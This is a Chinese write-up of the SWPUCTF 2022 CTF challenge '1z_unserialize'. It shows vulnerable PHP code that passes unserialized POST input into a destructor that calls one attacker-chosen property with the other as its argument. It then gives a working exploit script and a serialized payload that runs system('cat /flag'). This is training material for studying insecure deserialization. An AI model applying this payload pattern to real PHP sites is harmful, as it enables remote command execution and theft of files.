[SWPUCTF 2022 新生赛]1z_unserialize

题目描述:是很简单的反序列化噢

代码审计看注释

php 复制代码
<?php
 
class lyh{											//定义一个类为lyh
    public $url = 'NSSCTF.com';//公共属性,初始值为NSSCTF.com
    public $lt;									//公共属性,没有初始值
    public $lly;								//公共属性,没有初始值
     
     function  __destruct()	//__destruct()方法是php中的一个魔术方法,当对象被销毁是自动调用
     {
        $a = $this->lt;					
       //在这个方法中$a被赋值为$this->lt,然后$a($this->lly)被调用,这意味这$this->lt应给是一个
       //可以调用的函数或方法,	而$this-lly是传递给这个函数的参数

        $a($this->lly);
     }
    
    
}
unserialize($_POST['nss']);
//这行代码从POST请求中获取nss参数,并将其反序列化为php对象。反序列操作会将字符串转换回PHP对象
highlight_file(__FILE__);
 
 
?>
  1. 补充大佬的解释
  2. a($this->lly): 将 $this->lly 的值作为参数传递$a 所代表的函数。
  3. a = this->lt;a(this->lly);相当于lt(lly):很想命令执行函数+指令
  4. 所以我们可以通过构造一个恶意的序列化对象,将自定义的函数传递给lt属性,然后将要执行的代码(或指向一个恶意代码文件的路径)传递给lly属性。当对象被序列化后在被反序列化是,__destruct方法会被自动调用,从而执行指定的恶意操作。
  5. 只要传参把a变成system();,this-lly变成ls或者cat就是一个简单的命令注入了system("cat /flag");

写出php脚本exp

php 复制代码
<?php
class lyh{
   public $url = 'NSSCTF.com';
   public $lt = "system";
   public $lly = "cat /flag";
}

$sss = new lyh();
echo serialize($sss);
//O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

POST传参nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

相关推荐
前端世界2 天前
Python 正则表达式实战:用 Match 对象轻松解析拼接数据流
python·正则表达式·php
苏琢玉2 天前
用 PHP 玩向量数据库:一个从小说网站开始的小尝试
php·composer
wuk9982 天前
ThinkPHP 6框架常见错误:htmlentities()函数参数类型问题解决
php
万岳软件开发小城2 天前
开源与定制化对比:哪种在线教育系统源码更适合教育培训APP开发?
开源·php·软件开发·在线教育系统源码·教育小程序·教育app开发
lskblog2 天前
Composer安装教程及国内镜像设置(含腾讯云、阿里云镜像)
阿里云·php·腾讯云·laravel·composer
m0_738120722 天前
CTFshow系列——PHP特性Web93-96
开发语言·安全·web安全·php·ctfshow
@CLoudbays_Martin112 天前
为什么动态视频业务内容不可以被CDN静态缓存?
java·运维·服务器·javascript·网络·python·php
learning_tom2 天前
HTML图片标签及路径详解
linux·服务器·php
魔道不误砍柴功3 天前
Mac 能够连Wife,但是不能上网问题解决
网络·macos·php
搬码临时工3 天前
怎样让外网计算机访问局域网计算机?通过公网地址访问不同内网服务的设置方法
开发语言·php